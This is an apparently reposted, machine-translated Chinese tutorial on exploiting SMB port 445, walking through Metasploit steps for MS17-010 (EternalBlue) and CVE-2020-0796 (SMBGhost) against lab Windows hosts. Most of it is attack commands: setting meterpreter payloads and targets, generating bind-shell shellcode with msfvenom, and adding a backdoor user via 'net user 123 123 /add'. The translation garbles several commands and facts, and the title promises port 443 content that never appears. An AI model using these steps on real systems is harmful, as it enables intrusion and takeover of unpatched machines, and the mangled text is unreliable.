443端口漏洞如何利用,哪种漏洞不可通过445端口进行利用

  443端口漏洞如何利用,哪种漏洞不可通过445端口进行利用

  端口45用于访问共享文件夹。端口445是危险的,因为它在默认情况下是打开的。

  目标:win7系统IP: 10.0.0.199提前关闭目标的防火墙。

  一. MS17-010永恒之蓝

  MS,17岁,脆弱性10。也就是新闻报道的比特币勒索病毒。

  1.输入msfconsole: MSF控制台

  2.找到要利用的漏洞并输入编号(搜索命令):搜索ms17-010

  3.检查组件列表并选择要使用的攻击项目(使用命令):使用0

  4.对于这个提示,需要配置有效载荷,所以根据提示,Tab键完成一次,出来配置菜单两次。

  攻击负载:setpayload windows/x64/meter preter/(tab两次)

  (这里,有效负载被设置为tcp的反向连接)

  5.检查模块配置信息(有Yes的需要配置):命令:显示选项

  查看哪些系统命令可能受到攻击:info

  需要配置什么:本地主机IP: LHOST,目标IP: rhosts。

  5.配置(set命令):

  设置rhosts为10.0.0.199

  返回上级:返回

  6.开始攻击(漏洞利用命令):漏洞利用

  7.攻击成功后提示建立会话。

  "?"可以查看攻击物品。

  示例:shell命令进入对方命令行。

  此时可以在入侵界面操作命令,比如创建用户网user 123 123 /add。

  同时win7无人机显示用户创建成功。

  二。CVE-2020-0796永恒之蓝2.0

  基于SMBv3的漏洞,Windows 8和最新版本的Windows Server 2012-Windows 10都被抓了。这是一个系统级的漏洞。利用这个漏洞会让系统遭受‘蠕虫式’攻击,也就是说很容易从一个受害者感染到另一个受害者,一开机就会被感染。你可以为所欲为,比如加密你的文件,敲诈你。比如像永恒之蓝1.0 (Eternal Blue 1.0),加密文件,勒索你虚拟货币。

  准备

  目标飞机:win10 IP:10.0.0.171

  攻击

  下载插件

  将插件传递到kali系统的mnt文件夹中。

  在kali主机上输入命令:python3 scanner.py 10.0.0.171。

  意味着Win10中存在漏洞。

  下载另一个插件

  将插件传入kali的mnt文件夹。

  在kali上输入命令:python 3 CVE-2020-0796 . py 10 . 0 . 0 . 171

  结果是蓝屏。

  3.第三个工具

  (1)msfvenom生成正向连接的木马(只支持正向连接,不支持反向连接)

  (msfvenom的详细使用方法请参考https://www.jianshu.com/p/dee2b171a0a0)

  MSF venom-p windows/x64/meter preter/bind _ TCP LPORT=4444-b \ x00 -I 1-f python

  将exploit.py的这一部分替换为生成的shellcode(buf后面的字符串,保留USER_PAYLOAD不变)

  (2)打开kali的另一个xshell接口,在msfconsole下:打开msf monitoring。

  使用漏洞利用/多重/处理程序

  因为是反向壳,所以改成正向。

  设置有效负载windows/x64/meter preter/bind _ TCP

  设置lport 4444 //监听端口

  设置rhost 10.0.0.171 //目标主机

  (3)运行exploit.py脚本,弹回外壳。切换回第一个xshell接口。运行在第一步中修改的脚本

  至此,壳就获得了。

  例如,执行添加用户命令:

  净用户123 123 /add

  这时win10增加了一个123用户(密码123)。

  三。MS08-067网络服务器攻击

  同样的,这里就不赘述了。

郑重声明:本文由网友发布,不代表盛行IT的观点,版权归原作者所有,仅为传播更多信息之目的,如有侵权请联系,我们将第一时间修改或删除,多谢。

留言与评论(共有 条评论)
   
验证码: